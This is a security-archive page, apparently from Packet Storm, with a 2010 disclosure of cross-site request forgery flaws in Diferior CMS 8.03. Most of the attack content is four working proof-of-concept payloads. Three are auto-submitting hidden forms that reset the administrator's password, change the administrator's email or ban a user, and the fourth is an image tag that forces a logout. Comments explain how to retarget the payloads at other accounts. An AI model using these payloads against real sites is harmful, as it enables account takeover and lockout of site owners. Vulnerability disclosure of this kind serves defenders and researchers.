what you don't know can hurt you

Diferior CMS 8.03 Cross Site Request Forgery

Diferior CMS 8.03 Cross Site Request Forgery
Posted Jul 14, 2010
Authored by 10n1z3d

Diferior CMS version 8.01 suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
MD5 | 422f0eb4756000530ca272c6399a4bce

Diferior CMS 8.03 Cross Site Request Forgery

Change Mirror Download
<!---
Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: Tue 13 Jul 2010 11:50:32 AM EEST
Vendor: http://diferior.com/
Download: http://diferior.com/post_files/news/diferior-8-03-released/Diferior_v8.03.tar.gz
--->

-=[ CSRF PoC 1 - Change Admin Password ]=-

<html>
<head>
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Password</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/user/profile/pass.html" method="post">
<!--- You can change cust_user to change the password of other user --->
<input type="hidden" name="cust_user" value="admin" />
<input type="hidden" name="pass1" value="rootroot" />
<input type="hidden" name="pass2" value="rootroot" />
</form>
</body>
</html>

-=[ CSRF PoC 2 - Change Admin Email ]=-

<html>
<head>
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Email</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/user/profile/email.html" method="post">
<!--- You can change cust_user to change the email of other user --->
<input type="hidden" name="cust_user" value="admin" />
<input type="hidden" name="email1" value="root@root.com" />
<input type="hidden" name="email2" value="root@root.com" />
</form>
</body>
</html>

-=[ CSRF PoC 3 - Ban User ]=-

<html>
<head>
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Ban User</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/user/ban/[username]/2.html" method="post">
<input type="hidden" name="warned" value="on" />
<input type="hidden" name="noleech" value="on" />
<input type="hidden" name="banned" value="on" />
</form>
</body>
</html>

-=[ CSRF PoC 4 - Logout The User/Administrator ]=-

<img src="http://[domain]/user/logoff.html" alt="Do you see this?" />

<!---
http://www.evilzone.org/
irc.evilzone.org (6697 / 9999)
--->

Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close